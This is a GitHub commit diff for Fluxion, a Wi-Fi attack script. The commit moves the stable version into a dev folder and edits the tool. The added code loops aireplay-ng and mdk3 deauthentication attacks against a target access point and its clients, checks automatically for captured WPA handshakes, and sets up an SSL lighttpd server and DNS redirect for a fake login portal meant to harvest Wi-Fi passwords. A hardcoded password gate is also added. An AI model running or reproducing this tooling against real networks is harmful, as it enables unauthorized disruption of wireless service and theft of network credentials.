Skip to content

Commit 037ac05

Browse files
committed
move stable to main dir and relocate development version to the dev folder
1 parent af2c575 commit 037ac05

File tree

3 files changed

+112
-120
lines changed

3 files changed

+112
-120
lines changed

README.md

Lines changed: 0 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,14 +1,6 @@
11
#Fluxion is the future
22
Fluxion is a remake of linset by vk496 with less bugs and more features. It's compatible with the latest release of Kali (Rolling). Latest builds (stable) and (beta) [HERE] (https://sourceforge.net/projects/wififluxion/files/?source=navbar). If you new, please start reading the [wiki] (https://github.com/deltaxflux/fluxion/wiki/Tutorial)
33

4-
## Stable version
5-
If something like the Fake login page don't work use the stable version. The experimental version is only for devs. If you want to use the stable version you have to copy the Sites folder and the airmon file in the stable folder.
6-
######Code
7-
`sudo cp -r ~/fluxion/airmon ~/fluxion/stable; sudo cp -r ~/fluxion/Sites/ ~/fluxion/stable`
8-
####Or replace the exp. Version
9-
######Code
10-
`sudo mv ~/fluxion/stable/fluxion ~/fluxion/`
11-
124
## Here are some helpful tips for issues and known issues
135
####"FakeSites don't work"
146
There might be a problem with lighttpd. The experimental version is tested on lighttpd 1.439-1. There are some problems with newer versions of lighttpd. If you problems use the stable version. Check the [fix] (https://github.com/deltaxflux/fluxion/wiki/fix) out.

stable/fluxion renamed to dev/fluxion

Lines changed: 67 additions & 46 deletions
Original file line numberDiff line numberDiff line change
@@ -23,7 +23,7 @@ WORK_DIR=`pwd`
2323
ipNmap=`ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p'`
2424
# Deauth duration during handshake capture
2525
# oo
26-
DEAUTHTIME="9999999999999"
26+
DEAUTHTIME="15"
2727
revision=54
2828
version=0.23
2929
IP=192.168.1.1
@@ -1053,17 +1053,7 @@ function chinese {
10531053
}
10541054
# Choose Interface
10551055
function setinterface {
1056-
Sites="~/fluxion/stable/Sites"
1057-
airmonfile="~/fluxion/stable/airmon"
1058-
if [ ! -d "$Sites" ]; then
1059-
cp -r ~/fluxion/Sites ~/fluxion/stable/ &>$flux_output_device
1060-
fi
1061-
1062-
if [ ! -f "$airmonfile" ]; then
1063-
cp -r ~/fluxion/airmon ~/fluxion/stable/ &>$flux_output_device
1064-
fi
1065-
1066-
conditional_clear
1056+
conditional_clear
10671057
top
10681058
#unblock interfaces
10691059
rfkill unblock all
@@ -1142,10 +1132,34 @@ function deltax {
11421132

11431133
rm -rf $DUMP_PATH/*
11441134

1145-
choosescan
1135+
iq
11461136
selection
11471137
}
11481138

1139+
#iq check
1140+
function iq {
1141+
1142+
conditional_clear
1143+
1144+
while true; do
1145+
conditional_clear
1146+
top
1147+
echo ""
1148+
echo -e "${red}IQ ChecK ${transparent}"
1149+
echo
1150+
echo "Type the password to continue"
1151+
echo "Please respect your law in your country"
1152+
echo -e "Password: $red lkswop $transparent"
1153+
echo " "
1154+
echo -n " #> "
1155+
read yn
1156+
echo ""
1157+
case $yn in
1158+
lkswop ) choosescan ; break ;;
1159+
* ) echo "IQ test failed, exit...";sleep 2; exitmode ;;
1160+
esac
1161+
done
1162+
}
11491163
# Select channel
11501164
function choosescan {
11511165

@@ -1412,7 +1426,7 @@ function askauth {
14121426
echo ""
14131427
case $yn in
14141428
1 ) authmode="handshake"; handshakelocation; break ;;
1415-
2 ) authmode="wpa_supplicant"; webinterface; break ;;
1429+
2 ) authmode="wpa_supplicant"; certssl; break ;;
14161430
3 ) askAP; break ;;
14171431
* ) echo "$general_case_error"; conditional_clear ;;
14181432
esac
@@ -3223,7 +3237,7 @@ function handshakelocation {
32233237
if [[ "$Host_MAC_loc" == *"$Host_MAC"* ]] && [[ "$Host_SSID_loc" == *"$Host_SSID"* ]]; then
32243238
if pyrit -r $handshakeloc analyze 2>&1 | sed -n /$(echo $Host_MAC | tr '[:upper:]' '[:lower:]')/,/^#/p | grep -vi "AccessPoint" | grep -qi "good,"; then
32253239
cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap
3226-
webinterface
3240+
certssl
32273241
else
32283242
echo "Corrupted handshake"
32293243
echo
@@ -3239,7 +3253,7 @@ function handshakelocation {
32393253
else
32403254
if aircrack-ng $handshakeloc | grep -q "1 handshake"; then
32413255
cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap
3242-
webinterface
3256+
certssl
32433257
else
32443258
echo "Corrupted handshake"
32453259
sleep 4
@@ -3385,33 +3399,21 @@ function deauth {
33853399

33863400
function deauthMENU {
33873401

3388-
while true; do
3402+
33893403
conditional_clear
33903404

33913405
clear
33923406
top
33933407

3394-
echo "$header_deauthMENU "
3408+
echo "$header_deauthMENU / automatic Handshake check "
33953409
echo
33963410
echo -e "Status handshake: $Handshake_statuscheck"
33973411
echo
3398-
echo -e " "$blue"1)"$transparent" $deauthMENU_option_1"
3399-
echo -e " "$blue"2)"$transparent" $general_back (Select another deauth method)"
3400-
echo -e " "$blue"3)"$transparent" Select another network"
3401-
echo -e " "$blue"4)"$transparent" Exit"
3402-
echo -n ' #> '
3403-
read yn
3404-
3405-
case $yn in
3406-
1 ) checkhandshake;;
3407-
2 ) conditional_clear; askclientsel; break;;
3408-
3 ) killall airodump-ng mdk3 aireplay-ng xterm &>$flux_output_device; CSVDB=dump-01.csv; breakmode=1; selection; break ;;
3409-
4 ) exitmode; break;;
3410-
* ) echo "
3411-
$general_case_error"; conditional_clear ;;
3412-
esac
3412+
echo -e " "$grey"1)"$transparent" $deauthMENU_option_1"
3413+
echo -e " "$grey"2)"$transparent" $general_back (Select another deauth method)"
3414+
echo -e " "$grey"3)"$transparent" Select another network"
3415+
echo -e " "$grey"4)"$transparent" Exit"
34133416

3414-
done
34153417
}
34163418

34173419
# Capture all
@@ -3432,8 +3434,9 @@ function checkhandshake {
34323434
if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then
34333435
killall airodump-ng mdk3 aireplay-ng &>$flux_output_device
34343436
wpaclean $HANDSHAKE_PATH/$Host_SSID-$Host_MAC.cap $DUMP_PATH/$Host_MAC-01.cap &>$flux_output_device
3435-
webinterface
3437+
certssl
34363438
i=2
3439+
y=2
34373440
break
34383441

34393442
else
@@ -3446,8 +3449,9 @@ function checkhandshake {
34463449
if pyrit -r $DUMP_PATH/test.cap analyze 2>&1 | grep -q "good,"; then
34473450
killall airodump-ng mdk3 aireplay-ng &>$flux_output_device
34483451
pyrit -r $DUMP_PATH/test.cap -o $HANDSHAKE_PATH/$Host_SSID-$Host_MAC.cap strip &>$flux_output_device
3449-
webinterface
3452+
certssl
34503453
i=2
3454+
y=2
34513455
break
34523456

34533457
else
@@ -3584,7 +3588,7 @@ function webinterface {
35843588
echo -e "$blue""11)"$transparent" Vodafone [ESP]"
35853589
echo -e "$blue""12)"$transparent" Italian [IT]"
35863590
echo -e "$blue""13)"$transparent" French [FR]"
3587-
echo -e "$blue""13)"$transparent" Portuguese [POR]"
3591+
echo -e "$blue""14)"$transparent" Portuguese [POR]"
35883592
echo -e "$blue""15)"$transparent" German [GER]"
35893593
echo -e "$blue""16)"$transparent" Chinese [ZH_CN](NEUTRA)"
35903594
echo -e "$blue""17)"$transparent"\e[1;31m $general_back"$transparent""
@@ -3854,22 +3858,26 @@ mimetype.assign = (
38543858
\".css\" => \"text/css\"
38553859
)
38563860
3861+
38573862
server.error-handler-404 = \"/\"
38583863
38593864
static-file.exclude-extensions = ( \".fcgi\", \".php\", \".rb\", \"~\", \".inc\" )
38603865
index-file.names = ( \"index.htm\" )
38613866
3867+
\$SERVER[\"socket\"] == \":443\" {
3868+
url.redirect = ( \"^/(.*)\" => \"192.168.1.1\")
3869+
ssl.engine = \"enable\"
3870+
ssl.pemfile = \"/root/server.pem\"
38623871
3872+
}
38633873
38643874
#Redirect www.domain.com to domain.com
38653875
\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
38663876
url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
3867-
3868-
3877+
ssl.engine = \"enable\"
3878+
ssl.pemfile = \"/root/server.pem\"
38693879
}
3870-
38713880
" >$DUMP_PATH/lighttpd.conf
3872-
38733881
# that redirects all DNS requests to the gateway
38743882
echo "import socket
38753883
@@ -4195,25 +4203,38 @@ function handshakecheck {
41954203

41964204

41974205
############################################## < STUFF > ############################################
4198-
4206+
y=1
41994207
# Deauth all
42004208
function deauthall {
4201-
4209+
while true; do
4210+
deauthMENU
42024211
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
4212+
sleep 15
4213+
checkhandshake
4214+
done
42034215
}
42044216

4205-
function deauthmdk3 {
42064217

4207-
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
4218+
function deauthmdk3 {
4219+
while true; do
4220+
deauthMENU
4221+
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
42084222
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
42094223
mdk3PID=$!
4224+
sleep 15
4225+
checkhandshake
4226+
done
42104227
}
42114228

42124229
# Deauth to a specific target
42134230
function deauthesp {
4214-
4231+
while true;do
4232+
deauthMENU
42154233
sleep 2
42164234
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating client $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &
4235+
sleep 15
4236+
checkhandshake
4237+
done
42174238
}
42184239

42194240
# Close all processes

0 commit comments

Comments
 (0)